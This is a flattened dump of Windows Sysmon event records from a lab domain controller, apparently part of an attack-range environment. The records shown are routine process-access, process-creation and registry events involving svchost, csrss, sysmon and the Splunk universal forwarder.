13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.991{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:51:47.631{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0x107f6e18) 10341000x80000000000000008999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.412{59A5CD1D-9273-6005-B704-00000000A301}50164580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.272{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
